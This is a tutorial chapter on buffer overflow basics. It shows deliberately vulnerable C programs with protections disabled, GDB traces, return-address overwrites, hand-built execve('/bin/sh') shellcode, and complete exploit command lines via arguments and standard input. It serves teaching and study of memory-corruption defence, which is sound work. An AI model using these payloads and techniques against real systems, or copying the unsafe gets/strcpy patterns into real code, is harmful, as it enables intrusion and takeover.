====== Basic Concepts of Buffer Overflows ======

Interacting with memory is part of every non-trivial program. To process data reliably, a program must manage the sizes of its data buffers correctly. Writing more data than a buffer can hold results in a so-called buffer overflow: the memory region directly following the buffer is overwritten. This chapter explains this behavior and its effects in a detailed and practical way.

Modern compilers and operating systems include protection mechanisms that mitigate the effects of buffer overflows. For the sake of simplicity, these mechanisms are ignored for now and explained in later chapters. The first line of each example program contains the compilation command, which disables optimizations and protection mechanisms. All examples but the first one require that [[..protection:aslr|ASLR]] is disabled. The following command disables ASLR on a Linux system until it is enabled again or the machine is rebooted.

<code>
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
</code>

To enable ASLR again, use the command below.

<code>
$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
</code>

:!: As disabling ASLR and running binaries without compiler protection mechanisms poses a security risk, it is recommended to apply this change and execute the vulnerable applications in a virtual machine or another protected environment.

===== Control Flow Manipulation =====

With the theoretical concept from above in mind, a first practical example is presented next. The code below asks for the user's name and prints whether the user is an administrator or not. A user is classified as an administrator if the entered name is "admin".
<code c>
// gcc -g -O0 -m32 -std=c99 control.c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

struct User
{
    char name[8];
    bool is_admin;
};

int main()
{
    struct User user = {0};

    printf("Enter user name:\n");
    gets(user.name);

    if(strcmp(user.name, "admin") == 0)
        user.is_admin = true;

    if(user.is_admin)
        printf("Welcome back administrator!\n");
    else
        printf("Meh, hello %s. I was hoping for the administrator.\n", user.name);
    return 0;
}
</code>

Executing the code and entering "nufan" as name results in the output shown below.

<code>
$ ./a.out
Enter user name:
nufan
Meh, hello nufan. I was hoping for the administrator.
</code>

Assuming basic knowledge of the C programming language, this behavior should be no surprise. While the code is short and straightforward, it still contains a significant security vulnerability. ''user.name'' is a character array with a fixed size of 8 bytes. At the same time, the ''[[c:lib:stdio:gets|gets()]]'' function does not limit the length of the input. Next, we intentionally exceed the available input capacity.

<code>
$ ./a.out
Enter user name:
123456789
Welcome back administrator!
</code>

According to the output, we are classified as an administrator although an incorrect name was entered. To retrace this behavior, we look at the memory content after the initialization and after each of the two inputs above. [[gdb:start|GDB]] is used to inspect the memory of the ''user'' variable. Additionally, the relevant memory region is visualized to make it easier to follow.

First, the state of the ''user'' variable is inspected directly after initialization. A breakpoint is set in line 16 to stop execution and print the ''user'' variable.

<code>
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 16
Breakpoint 1 at 0x647: file control.c, line 16.
(gdb) run
Starting program: /home/memory-corruption/a.out
Breakpoint 1, main () at control.c:16
16          printf("Enter user name:\n");
(gdb) p user
$1 = {name = "\000\000\000\000\000\000\000", is_admin = false}
</code>

Below you can see a memory-oriented visualization of the GDB output.

{{.basics_init.png?300|}}

Just like before, we first enter the short name "nufan" and look at the resulting application state. To inspect the variable before the application exits, we set a breakpoint at the ''return'' statement in line 26.

<code>
(gdb) break 26
Breakpoint 2 at 0x565556b8: file control.c, line 26.
(gdb) continue
Continuing.
Enter user name:
nufan
Meh, hello nufan. I was hoping for the administrator.
Breakpoint 2, main () at control.c:26
26          return 0;
(gdb) p user
$2 = {name = "nufan\000\000", is_admin = false}
</code>

{{.basics_normal.png?300|}}

As expected, the memory content looks reasonable. The second case is much more interesting. Using "123456789" as name exceeds the space of ''user.name'' and results in the following state.

<code>
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 26
Breakpoint 1 at 0x6b8: file control.c, line 26.
(gdb) run
Starting program: /home/memory-corruption/a.out
Enter user name:
123456789
Welcome back administrator!
Breakpoint 1, main () at control.c:26
26          return 0;
(gdb) p user
$1 = {name = "12345678", is_admin = 57}
</code>

{{.basics_overflow.png?300|}}

The ''user.name'' buffer was filled up completely. Because even more data was entered, the '9' character ([[theory:encoding:ascii|ASCII]] value 57) spilled over into the adjacent variable ''user.is_admin''. Remember that in the C programming language every value other than 0 is considered to be true. Thus, the application classifies the user as administrator. Simply by overflowing an input buffer, the control flow of the application was redirected to an unintended execution branch.
Although this example seems harmless, as the control flow differs only by a static output, the same vulnerability could equally overwrite crucial user data((S. Chen, J. Xu, E. Sezer, P. Gauriar, and R. Iyer, "Non-Control-Data Attacks Are Realistic Threats", 14th USENIX Security Symposium, 2005)) or allow an attacker to take full control of the application.

===== Arbitrary Function Execution =====

While the previous example already made use of a buffer overflow, it is rather limited because it can only select a predefined control flow branch. The next example takes the exploitation one step further. The example code copies the first command line argument to a variable located on the stack.

<code c>
// gcc -g -O0 -m32 -no-pie -fno-pie -fno-stack-protector -mpreferred-stack-boundary=2 function.c
#include <stdio.h>
#include <string.h>

void admin_stuff()
{
    printf("Welcome back administrator!\n");
}

int main(int argc, char *argv[])
{
    char buffer[8] = {0};

    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }

    printf("Copying \"%s\"\n", argv[1]);
    strcpy(buffer, argv[1]);

    return 0;
}
</code>

Clearly, ''[[c:lib:string:strcpy|strcpy()]]'' copies an input of variable size into a buffer of fixed size. Note that the code contains a function ''admin_stuff()'' which is not part of the regular control flow. In contrast to the previous example, no local variable that determines the control flow is located on the stack. This time we will not try to switch to a predefined execution branch. Instead, we want to call ''admin_stuff()'', which exists within the binary but is never called by the program(([[https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/|Buffer Overflow Exploit - Dhaval Kapil]])). Building on the background knowledge explained in [[..background:exec|the previous chapter about program execution and function calls]], we extend the view of the memory to include the information about the stack frame.
The behavior of the application under normal circumstances is observed in GDB. Checking the memory directly after the initialization of the buffer, the top of the stack looks as follows.

<code>
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) set backtrace past-main
(gdb) break 14
Breakpoint 1 at 0x804848d: file function.c, line 14.
(gdb) break 23
Breakpoint 2 at 0x80484d2: file function.c, line 23.
(gdb) run ABCD
Starting program: /home/memory-corruption/a.out ABCD
Breakpoint 1, main (argc=2, argv=0xffffd444) at function.c:14
14          if(argc != 2)
(gdb) x/4wx $esp
0xffffd3a0:     0x00000000      0x00000000      0x00000000      0xf7e11286
</code>

{{.basics_function_init.png?300|}}

We can identify the 8 bytes of the ''buffer'' variable, the 4 bytes of the saved ''EBP'' register and the 4 byte return address. Just before the program finishes, the second breakpoint stops the execution.

<code>
(gdb) continue
Continuing.
Copying "ABCD"
Breakpoint 2, main (argc=2, argv=0xffffd444) at function.c:23
23          return 0;
(gdb) x/4wx $esp
0xffffd3a0:     0x44434241      0x00000000      0x00000000      0xf7e11286
</code>

{{.basics_function_normal.png?300|}}

Now the buffer is partially filled with the entered data. Observe the [[theory:endian|little-endian]] byte order of the values. The goal of this exercise is to overwrite the return address ''0xf7e11286'' on the stack. Instead of returning to the previous function on the call stack, the control flow should be redirected to the ''admin_stuff()'' function. With the protection mechanisms [[..protection:aslr|ASLR]] and [[..protection:pie|PIE]] disabled, the function has a static address within the binary and at runtime. ''nm'' is used to resolve the address of the symbol.

<code>
$ nm a.out | grep admin_stuff
08048466 T admin_stuff
</code>

This output shows that the ''admin_stuff()'' symbol is located at address ''0x08048466'' in the text segment of the binary. In order to overwrite the return address, the 8 byte ''buffer'' and the 4 byte ''EBP'' copy need to be skipped first.
"ABCDEFGHIJKL" is chosen to fill up this region. The payload is terminated by the address of ''admin_stuff()'' (''0x08048466'') in little-endian format.

<code>
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 23
Breakpoint 1 at 0x80484d2: file function.c, line 23.
(gdb) run $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08")
Starting program: /home/memory-corruption/a.out $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08")
Copying "ABCDEFGHIJKLf[?]"
Breakpoint 1, main (argc=0, argv=0xffffd434) at function.c:23
23          return 0;
(gdb) x/4wx $esp
0xffffd390:     0x44434241      0x48474645      0x4c4b4a49      0x08048466
(gdb) continue
Continuing.
Welcome back administrator!
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
</code>

{{.basics_function_overflow.png?300|}}

As the output shows, the ''admin_stuff()'' function is indeed executed. Due to the corrupted stack layout, the program crashes with a segmentation fault directly after the function has run. Remember that ''[[c:lib:string:strcpy|strcpy()]]'' writes a ''\0'' byte to terminate the destination string, which was omitted in the illustrations. This byte is also the reason why ''argc'' is shown as 0 at the breakpoint. All addresses are constant over multiple executions, so the exploit also works outside GDB and with arbitrary fill values for the memory region before the return address.

<code>
$ ./a.out $(echo -en "000000000000\x66\x84\x04\x08")
Copying "000000000000f[?]"
Welcome back administrator!
Segmentation fault
</code>

===== Arbitrary Code Execution =====

Although functionally identical to the previous example, the vulnerable program of this section has a larger buffer and does not contain any predefined function we want to call. Additionally, the address of the buffer is printed upon execution.
<code c>
// gcc -g -O0 -m32 -no-pie -fno-pie -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack execve.c
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[32] = {0};

    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }

    printf("Buffer: %p\n", buffer);
    strcpy(buffer, argv[1]);

    return 0;
}
</code>

The first step is to redirect execution to the data copied to the buffer. This is accomplished by filling up the 32 bytes of ''buffer'' plus the 4 bytes of the saved ''EBP'' register and overwriting the return address with the address of the buffer. We will first try this in GDB. It is important to note that addresses differ slightly when the application is executed within the debugger. Also note that command line arguments and environment variables are located on the stack and thus influence the address of the ''buffer'' array. Execute the application with arbitrary parameters of the intended length to find out the address of the buffer. In the following example the buffer is assumed to be located at ''0xffffd358''.

<code>
$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048466 <+0>:     push   ebp
   [...]
   0x080484d1 <+107>:   ret
End of assembler dump.
(gdb) break *0x080484d1
Breakpoint 1 at 0x080484d1: file execve.c, line 19.
(gdb) run $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff")
Starting program: /home/memory-corruption/a.out $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff")
Buffer: 0xffffd358
Breakpoint 1, 0x080484d1 in main (argc=0, argv=0xffffd414) at execve.c:19
20      }
(gdb) ni
0xffffd358 in ?? ()
</code>

{{.basics_exec_overflow.png?300|}}

As the last line of the output indicates, the execution was successfully redirected to the buffer.
However, when inspecting the instructions at this location, no meaningful code can be identified:

<code>
(gdb) x/s $eip
0xffffd358:     "12345678901234567890123456789012AAAAX\323\377\377"
(gdb) x/5i $eip
=> 0xffffd358:  xor    DWORD PTR [edx],esi
   0xffffd35a:  xor    esi,DWORD PTR [esi*1+0x39383736]
   0xffffd361:  xor    BYTE PTR [ecx],dh
   0xffffd363:  xor    dh,BYTE PTR [ebx]
   0xffffd365:  xor    al,0x35
(gdb) continue
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xffffd35a in ?? ()
</code>

The program crashes because of invalid memory accesses. This is understandable, as we only wanted to fill up the memory and did not care about mapping its content to instructions yet.

What we need at this point is executable code in compiled form. Generating this code using a high-level programming language most likely introduces unintended instructions, so we fall back to assembly. More specifically, we will use [[nasm:start|NASM]](([[http://www.nasm.us/|NASM]])) with Intel syntax(([[http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm|Intel and AT&T Syntax]])) to create our so-called shellcode. Our final goal is to execute the shell ''/bin/sh'' via the ''execve'' system call(([[http://man7.org/linux/man-pages/man2/execve.2.html|execve(2) - Linux manual page]]))(([[http://hackoftheday.securitytube.net/2013/04/demystifying-execve-shellcode-stack.html|SecurityTube.net Hack of the Day: Demystifying the Execve Shellcode (Stack Method)]])). Calling ''execve'' has the following requirements when the interrupt is triggered:

  * ''EAX'' contains an identifier for the system call and needs to have the value 11 (''0x0b'') for ''execve''.
  * ''EBX'' points to the (''\0''-terminated) name of the executable to be executed ("/bin/sh" in our case).
  * ''ECX'' points to ''argv'', an array that contains at least a pointer to the executable name (as referenced by ''EBX'') and is terminated with a ''NULL'' pointer.
  * ''EDX'' points to ''envp''. As we do not need environment variables for the execution, we can simply set it to ''NULL''.

First we need to correct the stack pointer. When returning from the ''main'' function, the stack frame is destroyed by increasing ''ESP''. Our buffer is still there, but ''ESP'' was moved to a higher memory address. As we want to push some values, we need to make sure that ''ESP'' points to a memory address lower than our buffer, so that we do not overwrite our own code. Subtracting ''0x30'' (48) is a good guess, as we want to skip the return address (4 bytes), the saved ''EBP'' (4 bytes), ''buffer'' (32 bytes) and possibly some stack-alignment padding introduced by the compiler.

<code>
sub esp,0x30
</code>

Next, we need the ''\0''-terminated string "/bin/sh" on the stack. As the stack grows from bottom (high memory addresses) to top (low memory addresses), we need to push the string in reverse order. Thus we start with the termination character ''\0''. Keep in mind that we are using ''[[c:lib:string:strcpy|strcpy()]]'' to copy the data. It stops copying at the first ''\0'' character in the source string, so the compiled code must not contain any 0 bytes. Luckily, there are several ways to calculate 0 without explicitly mentioning it. One common way is to xor a value with itself, which always results in 0 regardless of the value.

<code>
xor eax,eax
</code>

We do not have to care about the size of this termination value, so we push the 4 byte register to the stack:

<code>
push eax
</code>

The remaining string is 7 characters long. To push it as two words of 4 bytes each, we need to add a fill character. "//bin/sh" is an equivalent alternative to "/bin/sh" with 8 characters.

<code>
push 0x68732f6e ; hs/n
push 0x69622f2f ; ib//
</code>

Now that the string is set up correctly, the registers need to be filled accordingly. ''EBX'' needs to point to the name of the binary to execute. "//bin/sh" was pushed to the stack with the previous commands. Hence, ''ESP'' is a pointer to this string and can be copied to ''EBX''.
<code>
mov ebx,esp
</code>

Successful execution requires ''argv'' to be set correctly. This convention is also visible in C programs: ''argv'' is an array of pointers to strings (''char *argv[]'') and terminated by a ''NULL'' value. ''argv[0]'' contains the executable name.

<code>
push eax ; argv[1] = NULL
push ebx ; argv[0] = "//bin/sh"
</code>

''ECX'' needs to point to this array of pointers.

<code>
mov ecx,esp
</code>

Because no environment variables are needed, ''envp'', which is passed via ''EDX'', is set to ''NULL''.

<code>
mov edx,eax
</code>

Lastly, the system call number is set to 11 (''0x0b'') and the interrupt is triggered.

<code>
mov al,0xb
int 0x80
</code>

We are done! Here is the full code:

<code>
; nasm -f elf32 execve.s
sub esp,0x30
xor eax,eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov edx,eax
mov al,0xb
int 0x80
</code>

After translation with the ''nasm'' assembler, ''objdump'' is used to extract the executable code from the resulting object file.

<code>
$ objdump -d -M intel-mnemonic execve.o

execve.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:   83 ec 30                sub    esp,0x30
   3:   31 c0                   xor    eax,eax
   5:   50                      push   eax
   6:   68 6e 2f 73 68          push   0x68732f6e
   b:   68 2f 2f 62 69          push   0x69622f2f
  10:   89 e3                   mov    ebx,esp
  12:   50                      push   eax
  13:   53                      push   ebx
  14:   89 e1                   mov    ecx,esp
  16:   89 c2                   mov    edx,eax
  18:   b0 0b                   mov    al,0xb
  1a:   cd 80                   int    0x80
</code>

A little bit of Bash magic helps to extract the opcodes and bring them into a usable form.

<code>
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -En \\x$i; done
\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
</code>

The command calls ''objdump'' and uses ''sed'' to drop the first seven lines of the output. ''cut'' is applied to get the second tab-separated column of each line, which contains the machine code bytes of the instruction. A loop over these bytes adds the required ''\x'' prefix to the output. Count the number of bytes used for the payload to calculate the required padding.
<code>
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -en \\x$i; done | wc -c
28
</code>

To fill up 36 bytes (32 byte buffer + 4 byte ''EBP''), a padding of 8 bytes is required after the 28 bytes of shellcode. "12345678" was chosen in this case. Feeding this exploit into the application results in a command prompt.

<code>
$ ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff")
Buffer: 0xffffd3b8
$
</code>

Depending on the command line prompt settings, one might not notice the difference between the spawned shell and the simple termination of the binary. Executing the same command under ''strace'' and filtering for ''execve'' calls proves that ''//bin/sh'' is executed from the vulnerable binary.

<code>
$ strace -e execve ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff")
execve("./a.out", ["./a.out", "\203\35401\300Phn/shh//bi\211\343PS\211\341\211\302\260\v\315\2001234"...], 0x7fffffffe258 /* 47 vars */) = 0
strace: [ Process PID=10599 runs in 32 bit mode. ]
Buffer: 0xffffd3b8
execve("//bin/sh", ["//bin/sh"], NULL) = 0
strace: [ Process PID=10599 runs in 64 bit mode. ]
</code>

The overall memory state correlated with the assembly code is shown in the visualization below.

{{.basics_exec_exploit.png?500|}}

Finally we managed to execute arbitrary code by exploiting a buffer overflow vulnerability! :-)

===== Arbitrary Code Execution via Standard Input =====

The examples above copied data passed as command line parameters. Another common data source is the standard input stream. As the exploitation via the standard input stream involves a common pitfall, it is demonstrated with the following example.
<code c>
// gcc -g -O0 -m32 -std=c99 -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack stdin.c
#include <stdio.h>

int main(int argc, char *argv[])
{
    char input[32] = {0};

    printf("Buffer: %p\n", input);
    gets(input);

    return 0;
}
</code>

Inspecting the code shows that the application prints the address of the buffer and then reads data from the standard input via the ''gets()'' function. The following explanation assumes that the buffer is located at the address ''0xffffd324''. Using the shellcode from the previous section results in the payload structure listed next.

  * 28 bytes of shellcode
  * 12 bytes of padding to fill up the buffer and skip the saved EBP register
  * 4 bytes of return address (''0xffffd324'')

A [[perl:start|Perl]] command helps to generate the input for the exploit. Even if you are not familiar with Perl, make sure you are able to understand and generate inputs in a scripting language (e.g. [[py:start|Python]] or [[bash:start|Bash]] are perfectly fine as well).

<code>
$ perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"' \
| ./a.out
Buffer: 0xffffd324
$ echo $?
0
</code>

The program exits successfully, but without providing a shell to execute commands. Let's use ''strace'' to inspect what is going on.

<code>
$ perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"' \
| strace ./a.out
[...]
execve("//bin/sh", ["//bin/sh"], NULL) = 0
[...]
read(0, "", 8192) = 0
exit_group(0) = ?
</code>

The output shows that the shell was actually started, but closed immediately afterwards. Although confusing at first, the explanation for this behavior is reasonable. After the shell has started, it tries to read a command from the standard input. The input stream was used to send the payload to the application, and it was implicitly closed once the Perl command had finished.
As the shell realizes there is no more input to read, it exits silently. To keep the shell open and enter commands manually, we need to keep the input stream open. One possibility to do so is the following.

<code>
$ cat <(perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"') -\
| ./a.out
</code>

''<()'' is the process substitution operator of Bash. It runs the command between the parentheses, which in our case is a Perl command, and passes ''cat'' a file name from which the output of that command can be read. The ''-'' as second parameter tells ''cat'' to read from the standard input afterwards. ''cat'' therefore first writes the output of the Perl command to the pipe to ''a.out''. As the stream stays open, ''cat'' then waits for input on the standard input stream, which is passed on through the pipe as well(([[https://github.com/CMU-18739L-S15/PracticalCTFHacking/blob/master/binary_exploitation/README.md|PracticalCTFHacking - Binary Exploitation]])).

\\
----
[[..background:exec|← Back to program execution details]] [[..start|Overview]] [[.nop-sled|Continue with NOP sleds →]]